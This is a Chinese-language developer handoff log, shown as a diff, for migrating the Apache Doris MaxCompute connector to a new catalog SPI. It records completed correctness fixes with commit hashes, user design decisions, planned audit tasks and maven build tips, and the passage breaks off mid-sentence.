📅 历史:第 15 次 handoff(2026-06-08)— G2 + GC1 完成 + +# 🔥 第 15 次 handoff(2026-06-08,覆盖)— G2 + GC1 完成 + +> **本 session 主题**:完成 Batch-D 红线扩充 gap campaign 的 **G2 + GC1**(两者逻辑独立、触不同区:G2=读谓词路径连接器局部 / GC1=写事务路径 + fe-core session 透传)。各走 recon 核码(Rule 8)→ 独立 design doc →(Ultracode off,沿用前 4 issue 的 skip 设计验证 workflow 默认)→ 实现 → 守门(编译+UT+checkstyle+import-gate+mutation)→ 单 Agent 对抗 impl-review → 独立 `[P4-T06e]` commit + hash 回填。**两 issue 全 DONE,4 commit。** + +## ✅ 本 session 已完成 + +- **G2 FIX-PREDICATE-COLGUARD(Tier 2,minor,多半不可达)DONE @`fefbbad391d`(+回填 `1eeea30abcb`)**:列不存在守卫反转。`MaxComputePredicateConverter.formatLiteralValue:211` 在 `columnTypeMap.get(columnName)==null` 时静默引号化、下推非法谓词(如 `ghost == "5"`,整型字面量被错误引号化),而非 legacy 那样丢谓词(legacy `MaxComputeScanNode` containsKey 守卫→throw→caller per-conjunct catch 丢谓词)。**修**=该 null 分支 `return` → `throw UnsupportedOperationException`(与同方法 :198/:204/:260 既有守卫一致;连接器禁 import fe-core 的 AnalysisException),经 `convert()` 既有顶层 catch(:91-96)降级 `NO_PREDICATE` → BE 复算 = legacy「丢谓词」本质不变式。**correctness 已核(impl-review)**:MaxComputeConnectorMetadata 未 override applyFilter → conjuncts 永不在 BE 端 clear → 整树降级仅 perf、永不错结果;limit-opt 不交互(unknown 列不过 partition-equality 闸)。粒度差异(整 filter vs legacy per-conjunct)非本 fix 引入、correctness-safe。UT 16/16(+3)+ mutation 2 红。impl-review 单 Agent **APPROVE**(0 must-fix;nit=IS NULL 路 convertIsNull 无守卫=legacy parity 故意 out-of-scope)。 +- **GC1 FIX-BLOCKID-CAP-CONFIG(Tier 2,minor,写路径)DONE @`95575a4954d`(+回填 `eee07156e77`)**:写 block-id 上限硬编 `MAX_BLOCK_COUNT=20000L`(`MaxComputeConnectorTransaction:72`),无视 legacy 可调 `Config.max_compute_write_max_block_count`(`Config.java:2156`,fe.conf 可调)→ 调优部署静默回归。原硬编=已登记偏差 **DV-011**。**用户定 Option A(全局 Config 透传,true parity,反转 DV-011 的 Rule-2 推迟)**:连接器禁 import Config,故经 **session-property 通道透传**(镜像既有 `lower_case_table_names` 注入)——① fe-core `ConnectorSessionBuilder.extractSessionProperties` +1 行注入 `Config.max_compute_write_max_block_count`;② 连接器 `MaxComputeConnectorTransaction` 常量→实例字段 `maxBlockCount` + ctor 加参 + `DEFAULT_MAX_BLOCK_COUNT` fallback;③ 连接器 `MaxComputeConnectorMetadata` byte-identical key 常量 + map-typed `resolveMaxBlockCount`(absent/unparseable→DEFAULT 20000,零回归)+ `beginTransaction` 透传。**无 SPI 签名变更、import-gate 净**。UT 新 `MaxComputeConnectorTransactionTest` 5 + mutation M1(resolve 忽略 prop)/M2(cap 用 DEFAULT)共 3 红。impl-review 单 Agent **APPROVE-WITH-NITS**(0 must-fix)。**DV-011 已更新**(后续动作勾销:经 session-passthrough 恢复可调、非原拟 MCConnectorProperties[catalog-scoped 错 scope])。 + +## 👤 用户定夺(2026-06-08) +- **GC1 = Option A(全局 Config 透传,经 session-property)**——非原 DV-011 拟的 MCConnectorProperties(per-catalog,错 scope,非 legacy parity)。理由(采纳):legacy 读的是 fe 全局 Config,须读同一全局值方 true parity;session-property 通道有 `lower_case_table_names` 直接先例、无 SPI 变更。见 [[catalog-spi-connector-session-tz-gotcha]](连接器禁 import fe-core、经 session prop 读约定)。 +- **G2/GC1 = 沿用前批 skip 设计验证 workflow + 单 Agent 对抗 impl-review**(Ultracode off,同 G0/G5/G6/G7)。 + +## 🎯 下一 session = 🆕 翻闸完整性审计(零 legacy 回退)+ T3 + DOC(用户定,2026-06-08) + +> **🎉 Batch-D 红线扩充 gap campaign 的 Tier 1+2 fix 已全清**(G8/G0/G6/G5/G7/G2/GC1)。剩余 = ① 🆕 翻闸完整性审计(用户 2026-06-08 新增,下「任务 0」,无产线代码、可能查出新 gap)② T3 接受项登记 ③ 原 DOC 交付。 + +### 🆕 任务 0(用户新增 2026-06-08,优先)— 确认所有 MaxCompute 操作走新 SPI、零 legacy 回退 -### 1.【T08/D-020 新结论】keystone gap = M1(身份消费)⊥ M2(scan 路由),可分离 -- `tableFormatType` **产而不用**:`HiveConnectorMetadata.getTableSchema` 设了它,但 `PluginDrivenExternalTable.initSchema:79-109` **只读 `getColumns()`**、丢 `getTableFormatType()`(本 session firsthand 核读确认)。第二缺口:`getEngine:195-215`/`getEngineTableTypeName:217-231` switch **catalog type** 非 per-table format。 -- **M1**(fe-core 读格式做 per-table 引擎名/身份,**opaque 串、热路径不读**)在 A/B/C **三方案通用**;**M2**(单 hms connector 产 Hudi/Iceberg scan plan)才是 A/B/C 分歧处。→ keystone 可控化。 -- **M2 = 方案 B**([D-020],用户签字):新增向后兼容 default `ConnectorMetadata.getScanPlanProvider(handle)`(默认 null→回落 per-catalog `Connector.getScanPlanProvider()`),fe-core `PluginDrivenScanNode.getSplits` 优先 per-table、回落 per-catalog。前提:`ConnectorScanPlanProvider.planScan:62-66` 入参已带 per-table handle(本 session 核实)。**A 备选**(连接器内 router,零 SPI churn);**C 否决**(fe-core 长格式分派,违瘦 fe-core)。 -- **D-020 细化 D-005**(非推翻):tableFormatType 区分符沿用;D-005 的"fe-core→PhysicalXxxScan"措辞早于 P1 scan-node 统一,由 per-table provider seam 取代。**批 E 实现别按 D-005 旧措辞做 PhysicalXxxScan**。 +> **用户原话**:确认所有 maxcompute 的操作,都走到新的 SPI 框架上,不允许回退到老的代码上。 -### 2.【批 C 已用,批 E 仍需】parity 可行性 = golden-value(无跨模块编译路径) -- `fe-core` 只依赖 `fe-connector-api` + `fe-connector-spi`,**不依赖**具体 `-hudi`/`-hms`/`-hive` 模块;连接器模块不依赖 fe-core。import-gate(`tools/check-connector-imports.sh`)**只扫 `*/src/main/java`、只禁 connector→fe-core 单向**(test 豁免,但无编译路径仍使跨模块 parity 不可行)。 -- → legacy↔SPI parity 用 **golden 值**(注 legacy `file:line`)。测试栈 **JUnit5 only,无 mockito**,替身手写(`FakeHmsClient` 先例)。checkstyle **含 test 源**(`fe/pom.xml:162`)、**禁 static import**(用 `Assertions.assertX`)、**test 阶段不跑 checkstyle** → 单独 `mvn -pl checkstyle:check`。 +**目标**:对 `max_compute` catalog 的**每一类操作**,证 FE 分发可达新 SPI/PluginDriven 实现,且 legacy `MaxCompute*` 对应路径在运行时**零可达**(无静默回退)。= 🅱 Batch-D 删 legacy 的**静态前置确认**(零可达调用方 → 删除才安全)。 -### 3.【批 C 关键结论】COW/MOR schema = type-agnostic -- legacy `HMSExternalTable.initHudiSchema` 与 SPI `HudiConnectorMetadata.getTableSchema`→`avroSchemaToColumns` 都从**同一 avro schema** 推导列表,**零表型分支**。COW/MOR 区别**只在 scan planning**(`HudiScanPlanProvider.planScan:92`:COW=base files native、MOR=merged slices + delta logs JNI)。→ schema parity 是 avro→column 纯函数;表型只影响 `detectHudiTableType` + split 收集。 +**审计范围(逐类核「FE 入口 → SPI 路由」+「legacy 路径零可达」)**: +- 读:scan / 分区裁剪(P1-4) / 谓词下推(G0/G2) / limit-split(P3-9) / batch-mode(P3-11) / CAST 剥壳(F9)。 +- 写:INSERT / INSERT OVERWRITE(P0 gate) / 事务 begin·commit·block-alloc(GC1) / sink 分发(P0-2) / bind 投影(P0-3) / post-commit(P3-12)。 +- DDL:CREATE TABLE·CTAS(P2-7) / DROP TABLE / CREATE DB(P2-6) / DROP DB FORCE(P2-5) / CREATE CATALOG 校验(G6)。 +- 元数据:list db/table / get schema / DESCRIBE isKey(P3-10) / SHOW PARTITIONS / partitions() TVF。 -### 4.(沿用)SPI 分区裁剪链路 + Hive parity 基准(T05) -- `PluginDrivenScanNode.applyFilter`→`currentHandle`→`getSplits`→`HudiScanPlanProvider.resolvePartitions` 读 `getPrunedPartitionPaths()`。Hudi `applyFilter` 镜像 `HiveConnectorMetadata.applyFilter`(7 步 + 7 helper duplicate,hudi 仅依赖 fe-connector-hms)。 +**已知风险区(必查、勿信先验「已修」标签 — Rule 8/12)**: +- ⚠️ **FE 分发缺口** [[catalog-spi-cutover-fe-dispatch-gap]]:`PluginDrivenExternalCatalog` 仅 override `createTable`、`metadataOps` 曾永 null → DROP TABLE / CREATE DB / DROP DB / SHOW PARTITIONS / partitions TVF 的 FE 分发是否真接 SPI。**该 memory 的「已修完」状态 2026-06-07 对抗 review 两度被证伪**(见 `plan-doc/reviews/P4-maxcompute-full-rereview-2026-06-07.md`)→ 必须逐路径重核,不得信任何「已修」标签。 +- legacy 删除候选逐个确认对 `max_compute` **零运行时可达调用方**:`MaxComputeExternalCatalog` / `MaxComputeScanNode` / `MaxComputeMetadataOps` / `MCTransaction` / `PhysicalMaxComputeTableSink` / `bindMaxComputeTableSink` / `allowInsertOverwrite` 的 MC 分支 / `MaxComputeExternalTable`。 +- 「分发只接一半」反模式(已多次踩:P0 overwrite 顶层网关挡死下层;FE 仅 override createTable):每个 op 须核**完整**分发链,非仅「连接器实现存在」。 -### 5.(沿用)BE Hudi JNI column_types/names/delta 契约(T02) -- `THudiFileDesc.{delta_logs,column_names,column_types}` thrift `list`;**BE 自做 join**:names `,` / types **`#`** / delta `,`(`hudi_jni_reader.cpp:52-54`)。FE 传 typed list、类型串用 Hive 串(`HudiTypeMapping.toHiveTypeString`,非 `getTypeName()`)。 +**成功标准(Rule 4,强标准供独立 loop)**:产出审计报告(建议 `plan-doc/reviews/P4-cutover-completeness-audit-.md`)——每 op 一行:路由✅(FE 入口→SPI 实现 file:line) / 回退⚠️(file:line + 判据);任何回退/缺口登记为新 gap 进 `plan-doc/task-list-batchD-redline-gaps.md` 修复。**法**:grep + 调用链 trace(SPI_READY catalog 经 `PluginDrivenExternalCatalog`/`PluginDrivenExternalTable`→`PluginDrivenScanNode`);可选 clean-room 对抗 workflow(需用户 opt-in,复用 `plan-doc/reviews/maxcompute-full-rereview.workflow.js`)。 -### 6.(沿用)批 E 去向 + 沿用坑 -- rebase 后 fe-core `target/generated-sources/.../DorisParser.java` 残留 → cannot find symbol:**clean fe-core**(非 fe-sql-parser),别当代码 bug 查。 -- `PhysicalPlanTranslator` 里 hudi **之外**的连接器 `instanceof` 分支待各自 P 阶段迁完再删,**本场只动 hudi**。 -- 用户向文档在 doris-website 仓(DV-004)。 -- connectors/hudi.md 的 §关联「偏差:(暂无)」是 pre-existing 陈旧(实际 DV-005..008 相关),本场未顺手改(surgical);下次清 kanban 时一并修。 +**关系**:本任务 ⊇ 既有「Batch-D redline 扩充」DOC 的 zero-survivor 复核(DOC 是其产物/子集);与 🅰 live e2e 并列为 🅱 Batch-D 删 legacy 的两大解锁门(本任务 = 静态分发面、🅰 = 运行时真值面)。 + +### 任务 1–2(原计划,T3 + DOC) + +1. **T3 Tier-3 DV batch(GAP3/4/9/10,登记 deviation,无代码)**:在 `plan-doc/deviations-log.md` 登记 4 条接受项 + 各 file:line + 接受理由: + - GAP3 CREATE DB 非-IFNE:`ERR_DB_CREATE_EXISTS`(1007/HY000 本地预抛)→透传 ODPS DdlException(P2-6 已注 pre-existing)。 + - GAP4 DROP TABLE 非-IF-EXISTS+远端缺:`ERR_UNKNOWN_TABLE`(1109/42S02)→通用 DdlException(本地名)。 + - GAP9 SHOW PARTITIONS `LIMIT`:legacy paginate-then-sort → 新路 sort-then-paginate(新路更合 ORDER-BY-LIMIT)。 + - GAP10 partitions() TVF:schema-分区但零实例表 legacy 抛→新路返 0 行(已有 in-code 注释声明 intentional)。 +2. **DOC:Batch-D redline 扩充**(原任务交付,仍欠):把全部行为逻辑副本作 must-land-before-delete 红线补入 `plan-doc/tasks/designs/P4-batchD-maxcompute-removal-design.md` §1/§2;更正 scan-node 红线注漏列 **LIMIT-split 第 3 行为副本**(等价物在 P3-9,注应 cite);登记 ES `EsTypeMapping:191` 同款 emit "NULL" latent token bug(G7 out-of-scope,留待 ES 翻闸)。 + +> 其后:**🅰 live e2e 终验(真实 ODPS)= 翻闸真正完成门**(所有静态修复 DV 真值闸须 live 验,CI 跳;G2 ~不可达无自然 live 路、GC1 = fe.conf 调 block 上限→大写入越限/放宽)→ **🅱 Batch-D 删 legacy(21 文件,gated on live e2e)**。详见下方折叠历史。 + +## ⚙️ 操作须知(复用 + 本 session 新坑) +- maven 必绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml` + `-pl :` + `-Dmaven.build.cache.enabled=false`;改连接器 `:fe-connector-maxcompute`、改 fe-core `:fe-core`。读真实 `Tests run:`/`BUILD`,勿信后台 task exit code。 +- **本 session 新坑(重要)**:`.m2` 里 `fe-connector-spi` 安装的 pom 含字面 `${revision}` parent token → 独立 `-pl :fe-connector-maxcompute test`(**无 `-am`**)报 dependency resolution `fe-connector:pom:${revision} (absent)`(负缓存、不自动重试)。**解法 = 一律带 `-am`**(reactor 内解析 ${revision},绕过 .m2 坏 pom):`mvn -f fe/pom.xml -pl :fe-connector-maxcompute -am test [-Dtest=X -DfailIfNoTests=false] -Dmaven.build.cache.enabled=false`。⚠️ `-am install -DskipTests` **不修**该负缓存(仍须 -am 跑测)。 +- mutation:cp 备份产线到 `/dev/shm`(RAM)→ Edit 重引入 bug → `-am test` 确认向红 → cp 还原 → grep 验还原。改连接器 ctor/常量时注意单 caller(`new MaxComputeConnectorTransaction` 仅 beginTransaction + 新 test)。 +- 分支 `catalog-spi-05`,本地未 push。本 session 4 commit。未跟踪 `.audit-scratch/`/`conf.cmy/`/`regression-conf.groovy.bak`/`.claude/scheduled_tasks.lock`(勿提交)。 + +## 🧠 给下一个 agent 的 meta +- **live e2e(真实 ODPS)仍是翻闸真正完成门**——本批为静态/UT 层判定。 +- auto-memory:连接器禁 import fe-core([[catalog-spi-connector-session-tz-gotcha]]);测基建无 fe-core/无 mockito、child-first loader([[catalog-spi-fe-core-test-infra]]);clean-room 对抗偏好([[clean-room-adversarial-review-pref]]);构建/守门坑([[doris-build-verify-gotchas]],本 session 已补 maven `-am` 必带 / ${revision} 负缓存坑)。 + +
--- -## 🎯 下一个 session 第一件事 +
📅 历史:第 14 次 handoff(2026-06-08)— G6 + G5 + G7 批量完成 + +# 🔥 第 14 次 handoff(2026-06-08,覆盖)— G6 + G5 + G7 批量完成 + +> **本 session 主题**:批量修复 Batch-D 红线扩充 gap campaign 的 **G6 + G5 + G7**(三者逻辑独立、触不同区)。各走 recon 核码 → 独立 design doc →(Ultracode off,用户定 skip 设计验证 workflow)→ 实现 → 守门(编译+UT+checkstyle+import-gate+mutation)→ 单 Agent 对抗 impl-review → 独立 `[P4-T06e]` commit + hash 回填。**三 issue 全 DONE,6 commit。** + +## ✅ 本 session 已完成 + +- **G6 FIX-CREATE-CATALOG-VALIDATION(Tier 2,major)DONE @`1fc00178484`(+回填 `8bc2c5cade2`)**:`MaxComputeConnectorProvider` 未 override `validateProperties`(继承 SPI no-op)→ CREATE CATALOG 跳过全部属性校验(required PROJECT/ENDPOINT、split floor、account_format、timeout>0、auth)。**修**=override `validateProperties` 逐字镜像 legacy `MaxComputeExternalCatalog.checkProperties:388-457` 六校验、抛 `IllegalArgumentException`(经 `PluginDrivenExternalCatalog.checkProperties:159` catch→DdlException,= legacy 形态);wire 既有 dead `MCConnectorClientFactory.checkAuthProperties`(4 处 RuntimeException→IllegalArgumentException,零调用方安全)。required ENDPOINT 取**字面 key**(= legacy CREATE parity;region/odps_endpoint 为 replay backward-compat、不在新 CREATE 接受;impl-review 证 `CatalogMgr` `!isReplay`-gated、老 catalog 不受影响)。UT `MaxComputeConnectorProviderTest` 19/19 + mutation 3 组向红。impl-review 单 Agent **APPROVE-WITH-NITS**(0 must-fix;nit=纠正 legacy 错误 message 文案,故意改)。 +- **G5 FIX-AGG-COLUMN-REJECT(Tier 2,minor)DONE @`c5e8ba6d9e2`(+回填 `aa28c97f8ef`)**:`CREATE TABLE (c INT SUM)` 对 mc 表静默建普通列(**证伪 P2-8「非-OLAP 路径已覆盖聚合列」**)。nereids 唯一拒 bare 非-key aggType 的 `validateKeyColumns` 仅在 `ENGINE_OLAP` 块内被调、非-OLAP 不可达。**用户定 Option B(加 SPI 字段,非 HANDOFF 原倾向的 fe-core guard)**——逐字镜像 P2-8 isAutoInc:`ConnectorColumn` 加 additive 第 8 字段 `isAggregated`(8-arg ctor、7-arg 委托 default false、getter/equals/hashCode;全 25 call site 仅 converter 改 8-arg)+ `CreateTableInfoToConnectorRequestConverter` 算 `isAggregated = getAggType()!=null && !=AggregateType.NONE`(= `Column.isAggregated()`)+ `MaxComputeConnectorMetadata.validateColumns` 在 isAutoInc 检查后加 `if(col.isAggregated())throw`(逐字镜像 legacy `MaxComputeMetadataOps.validateColumns:426-429`,**相邻** auto-inc 分支)。over-rejection 已核(隐式 aggType 赋值块 isOlap-gated、validate(isOlap=false))。UT 4/4/11 + mutation 3 组向红。impl-review **APPROVE**(0 must-fix)。 +- **G7 FIX-VOID-TYPE-MAPPING(Tier 2,minor)DONE @`49113dc7860`(+回填 `74822486792`)**:ODPS VOID 列映 UNSUPPORTED(legacy=Type.NULL)。`MCTypeMapping` VOID emit token `"NULL"`,但 `ScalarType.createType` 只认 `"NULL_TYPE"`("NULL" 抛→`ConnectorColumnConverter` catch→UNSUPPORTED)。**修**=连接器局部:① VOID token `"NULL"`→`"NULL_TYPE"`(fe-core convertScalarType default 即产 Type.NULL,无需改 fe-core);② switch default `return UNSUPPORTED`→`throw DorisConnectorException`(fail-fast,镜像 legacy `mcTypeToDorisType:294`)。**fix-2 安全性**:BINARY/INTERVAL_*/JSON 显式 UNSUPPORTED case 不受影响;impl-review 经 24-值 OdpsType 枚举 set-diff 证**仅 `OdpsType.UNKNOWN`(SDK sentinel、非真实列类型)落 default**、legacy 对 UNKNOWN 同 throw→parity、真实表零回归。UT `MCTypeMappingTest` 5/5 + mutation 2 组向红。impl-review **APPROVE**(0 must-fix)。**out-of-scope(留待 ES 翻闸)**:ES `EsTypeMapping:191` 同款 emit "NULL" latent token bug(其 test 还钉了 buggy token),未修。 + +## 👤 用户定夺(2026-06-08) +- **G5 = Option B(加 SPI 字段 `isAggregated`)**——非 HANDOFF 原倾向的 fe-core guard。理由(采纳):聚合拒绝是 legacy `validateColumns` 中 auto-inc 拒绝的**相邻行**,连接器 `validateColumns` 已含 `isAutoInc` 检查,Option B 完成同方法的 legacy 镜像;且与 P2-8 一致(full parity 非 deviation)。见 [[catalog-spi-p2-ddl-decisions]]。 +- **G6/G7 = 直接 implement(无单独设计验证 workflow,Ultracode off)**,走守门 + 单 Agent impl-review。 +- **G7 secondary defect(未知 OdpsType fail-fast)= 纳入修复**(parity + Rule 12 fail-loud;零现表风险;经 `TypeInfoFactory.UNKNOWN` 可 UT)。 +- **下一 session = G2 + GC1**(本次定)。 -``` -1. 自检: - git branch --show-current → catalog-spi-04 - git log --oneline -6 → <本 doc>(T08/D-020) 76586b2(批 C handoff) 435065f(T07 feat) 04f6576 10b72d4 301fe38 - git status → clean(除 .audit-scratch/ conf.cmy/ regression-conf.bak;research/ 现已跟踪) - Read PROGRESS.md §一/§三 + 本文件关键认知 1(M1⊥M2 + D-020) +## 🎯 下一 session = G2 + GC1(用户定,2026-06-08) -2. PR #64143 已开(base apache/doris:branch-catalog-spi、head morningman:catalog-spi-04): - gh pr view 64143 --repo apache/doris → 盯 CI / review - review 改动在 catalog-spi-04 续 commit + push 即自动进 PR(前序均 squash-merge) - 合入后:批 E 并入 P7(T08/D-020 已出 M1+M2 设计)或启 P4 - → P3 内不碰 SPI_READY_TYPES / fe-core 消费实现 / legacy / 非 hudi 连接器(皆批 E) +> **方法论(每 issue)**:recon 核码(**Rule 8,下列 anchor 已核但仍可漂移**)→ 独立设计 `tasks/designs/P4-T06e--design.md` → 设计验证(**⚠️ Ultracode 仍关**:workflow 需用户 opt-in,否则单/双 Agent 对抗或用户定 skip)→ 实现 → 守门(编译+UT+checkstyle+import-gate+mutation)→ impl-review → 独立 `[P4-T06e]` commit + hash 回填 + tracker。live tracker `plan-doc/task-list-batchD-redline-gaps.md`。 -3. 若走 (2) 批 E:实现序见本文件「批 E backlog」M1→M2→M4→翻闸; - 设计直接读 designs/P3-T08-tableformat-dispatch-design.md(M1+M2 + Implementation Plan + Open)。 -``` +1. **G2 FIX-PREDICATE-COLGUARD(Tier 2,minor,多半不可达)— 连接器**:列不存在守卫反转。legacy `MaxComputeScanNode:415-421/478-484` 谓词引用未知列→抛→丢谓词;新路 `MaxComputePredicateConverter.formatLiteralValue` 取 `columnTypeMap.get(columnName)` 为 null 时静默引号化→下推非法谓词。**已核当前 anchor(G0 已移位)**:`MaxComputePredicateConverter.java:202`(formatLiteralValue) / **`:210-211`** `OdpsType odpsType = columnTypeMap.get(columnName); if (odpsType == null) {...}`——此 null 块即守卫点。实务 bound 谓词只引真列、columnTypeMap key 集与 legacy 一致→**多半不可达**;修=该 null 分支改 throw/skip(对齐 legacy 丢谓词、不下推非法)。低优。 +2. **GC1 FIX-BLOCKID-CAP-CONFIG(Tier 2,minor)— 连接器写路径**:写 block-id 上限硬编 `MAX_BLOCK_COUNT = 20000L`(**已核** `MaxComputeConnectorTransaction.java:72`,用于 `:146`;`:68` 注释已自承硬编 = `Config.max_compute_write_max_block_count` 默认),无视 legacy `MCTransaction.java:165` 读的可调 `Config.max_compute_write_max_block_count`(`Config.java:2156`,`=20000L`)→ 调优部署静默回归。修=连接器读该 Config 值。**⚠️ 关键调研点(未解)**:连接器**禁 import fe-core**(含 `org.apache.doris.common.Config`,import-gate 禁)→ 须查连接器如何拿 fe Config 值:候选 = ConnectorContext / catalog property 透传 / `ConnectorSession.getSessionProperties()`(参 P3-9 limit-opt 经 session prop 读 var、G0 经 `ConnectorSession.getTimeZone()` 的约定)。若无现成透传通道,需**设计定夺**(加 property/context 透传 vs 接受+登记 deviation)——可能需问用户。 + +> 其后(本批之后,**非本 session**):**T3 Tier-3 DV batch(GAP3/4/9/10 登记 deviation,无代码)→ DOC(Batch-D redline 扩充 design §1/§2 must-land-before-delete + scan-node 注补 LIMIT-split 第 3 副本 + 登记 ES `EsTypeMapping:191` 同款 token bug)**。详见下方折叠「第 12 次 handoff」§下一 session 待办 7-8 项。 + +## ⚙️ 操作须知(复用) +- maven 必绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml` + `-pl : -am` + `-Dmaven.build.cache.enabled=false`;改连接器 `:fe-connector-maxcompute`、改 SPI `:fe-connector-api`(**须 -am、连带 rebuild maxcompute + fe-core**)、改 fe-core `:fe-core`。读真实 `Tests run:`/`BUILD`/`MVN_EXIT`,勿信后台 task exit code。checkstyle 走 `test` 的 validate 阶段自动跑(或 `checkstyle:check`);import-gate `bash tools/check-connector-imports.sh`(repo 根)。 +- mutation:Edit 改产线一处→跑相关 UT→确认对应 test 变红→Edit 还原;备份产线文件到 `/dev/shm`(RAM,避 `/mnt/disk1` 满时 cp 截断,auto-memory [[doris-build-verify-gotchas]])。改产线令 import 变 unused 时改用「翻转谓词」式 mutation(保 import 用、免 checkstyle 拦——本 session G5-M2 踩过)。 +- 分支 `catalog-spi-05`,本地未 push。本 session 6 commit。未跟踪 `.audit-scratch/`/`conf.cmy/`/`regression-conf.groovy.bak`/`.claude/scheduled_tasks.lock`(勿提交)。 + +## 🧠 给下一个 agent 的 meta +- **live e2e(真实 ODPS)仍是翻闸真正完成门**——本批为静态/UT 层判定;G6 非法属性 CREATE 拒绝须 live 验(登记 DV)。 +- auto-memory:连接器禁 import fe-core([[catalog-spi-connector-session-tz-gotcha]]);测基建无 fe-core/无 mockito、child-first loader([[catalog-spi-fe-core-test-infra]]);P2 DDL 定夺([[catalog-spi-p2-ddl-decisions]],G5 续其 isAutoInc→isAggregated SPI-字段模式);clean-room 对抗偏好([[clean-room-adversarial-review-pref]])。 + +
--- -## 📂 P3 关键文件锚点 - -``` -T02(已修): HudiTypeMapping.toHiveTypeString / HudiScanRange(typed list)/ BE hudi_jni_reader.cpp:52-54 -T03(批 E): ExternalUtil.initSchemaInfo / BE table_schema_change_helper.h:219-267 / HudiColumnHandle(无 field id) -T04(已修): PhysicalPlanTranslator.visitPhysicalHudiScan SPI 分支(两守卫) -T05(已修): HudiConnectorMetadata.applyFilter(7 步 + 7 helper)/ HudiPartitionPruningTest(FakeHmsClient 先例) -T06(决策): ConnectorMetadata MVCC 三 default / 无 override(opt-out) -T07(已修): HudiConnectorMetadata.avroSchemaToColumns(顶层降字 + package-private static) - 测试: hudi HudiTypeMappingTest/HudiSchemaParityTest/HudiTableTypeTest;hms HmsTypeMappingTest;hive HiveFileFormatTest/HiveConnectorMetadataPartitionPruningTest - 设计: designs/P3-T07-test-baseline-design.md -T08(本场,设计): 设计 designs/P3-T08-tableformat-dispatch-design.md;决策 D-020 - keystone: PluginDrivenExternalTable.initSchema:79-109(只读 columns)/ getEngine:195-215 / getEngineTableTypeName:217-231(switch catalog type) - M2 seam: ConnectorMetadata:37-44(加 default getScanPlanProvider(handle))/ Connector.getScanPlanProvider:40-42(per-catalog 回落) - ConnectorScanPlanProvider.planScan:62-66(入参带 handle)/ PluginDrivenScanNode.getSplits(~356-378,fe-core 改动点,批 E) - 载体: ConnectorTableSchema.getTableFormatType:58-60 - 素材: plan-doc/research/spi-multi-format-hms-catalog-analysis.md(本场已跟踪) -gate: CatalogFactory.java:52(SPI_READY_TYPES,不含 hms/hudi——别动) -设计备忘: plan-doc/tasks/designs/P3-T02-*.md / T04 / T05 / T06 / T07 / T08 -scratch: .audit-scratch/p3-t0X-*.workflow.js(本地 workflow 脚本,未跟踪) -``` +
📅 历史:第 13 次 handoff(2026-06-08)— G0 FIX-DATETIME-PUSHDOWN-FORMAT 完成 + +# 🔥 第 13 次 handoff(2026-06-08,覆盖)— G0 FIX-DATETIME-PUSHDOWN-FORMAT 完成 + +> **本 session 主题**:续做 Batch-D 红线扩充 gap 修复 campaign 的 **G0**(Tier 1,major correctness/perf)。设计 → (用户定 **skip** 设计验证 workflow)→ 实现 → 守门 → 单 Agent impl-review → 独立 commit。 + +## ✅ 本 session 已完成 +- **G0 FIX-DATETIME-PUSHDOWN-FORMAT(Tier 1)DONE @`0d983a1c056`**:DATETIME/TIMESTAMP/TIMESTAMP_NTZ 谓词下推坏(两 delta)。**delta-1**:`MaxComputePredicateConverter` 用 `String.valueOf(LocalDateTime)`('T' 分隔变精度,如 `"2023-02-02T00:00"`)喂空格定长 formatter → 非 UTC session `LocalDateTime.parse` 抛 → 整 conjunct 树降 `NO_PREDICATE`(谓词永不下推=perf 回归)/ UTC session 推 malformed 字面量。**delta-2**:source TZ 取 project-region(endpoint 推)而非 session TZ → 跨 TZ 静默丢行。**修**(连接器局部、无 SPI 变更,对齐 legacy `MaxComputeScanNode.convertLiteralToOdpsValues`)=① 直接对 `LocalDateTime` 用目标 formatter 格式化(逐字镜像 legacy `getStringValue(DatetimeV2Type(3|6))`,删字符串版 `convertDateTimezone`);② source TZ 改 `ConnectorSession.getTimeZone()`(≡ legacy `DateUtils.getTimeZone()`),TZ id 以**字符串**传入、在 converter 内**惰性** `ZoneId.of`(`convert()` 的 catch 内)。 + - **⚠️ impl-review F1(real regression,已折入)**:初版 `convertFilter` 内 eager `ZoneId.of(session.getTimeZone())`。但 Doris `SET time_zone='CST'`(华区常见,本 Alibaba 连接器尤甚)被 `TimeUtils.checkTimeZoneValidAndStandardize` **逐字存**,而 `java.time.ZoneId.of("CST")` 抛 `ZoneRulesException`(PST/EST/MST 同;UTC/GMT/+08:00/Asia*/Z/PRC OK——已实测)→ eager 解析炸出 `planScan`(无 catch)→ **整查询失败**(含非 datetime 如 `id=5`),比 legacy(per-conjunct catch 降级、仅 datetime 解析 TZ)+ 翻闸前(`resolveProjectTimeZone` 永不抛)双回归。**惰性解析修法** → datetime+CST 降级 `NO_PREDICATE`(BE 兜底,结果仍正确)、非 datetime 仍下推、NTZ 不解析 = **legacy parity**。 + - 守门:编译 + UT `MaxComputePredicateConverterTest` **13/13** + 连接器模块 55(1 skip,live) + checkstyle 0 + import-gate 0 + mutation(M1 `format→toString` 8红 / M2 `忽略 session zone` 3红 → 还原绿)。**真值闸 live ODPS=DV-022**(跨 UTC/非-UTC session TZ datetime 谓词正确下推、不丢行)。 + - 设计 `plan-doc/tasks/designs/P4-T06e-FIX-DATETIME-PUSHDOWN-FORMAT-design.md`。**Batch-D 死代码清理项**:`MCConnectorEndpoint.resolveProjectTimeZone` + `REGION_ZONE_MAP`(~60 行)翻闸后零调用方(本 fix 仅删 provider 内死的私有 wrapper)。 + +## 👤 用户定夺(2026-06-08) +- **G0 design-verify = Skip → 直接 implement**(设计已深度核码:format 字节级对齐 + TZ source 经 `from(ctx)` 确认);仍走守门 + 末端 impl-review。 +- **G0 死代码 = Keep + defer Batch-D**(仅删 provider 内死 wrapper;public 方法+map 留待 Batch-D 清理)。 + +## 🎯 下一 session = 批量修复 G6 + G5 + G7(用户定,2026-06-08) + +> **用户定夺**:下一新 session **同时修复 G6 + G5 + G7**。三者**逻辑独立、触不同区**(G6=连接器 provider 校验 / G5=fe-core 列校验 / G7=类型映射),可并行 research/设计;但各仍走**独立 design doc + 独立 `[P4-T06e]` commit + 各自守门**(不合并 commit)。其后 **G2 / GC1 → T3 Tier-3 DV batch(GAP3/4/9/10 登记 deviation)→ DOC(Batch-D redline 扩充 + scan-node LIMIT-split 注补)**。live tracker `plan-doc/task-list-batchD-redline-gaps.md`。 + +> **方法论(每 issue)**:独立设计 `tasks/designs/P4-T06e--design.md` → 设计验证(**⚠️ Ultracode 仍关**:workflow 需用户 opt-in,否则单/双 Agent 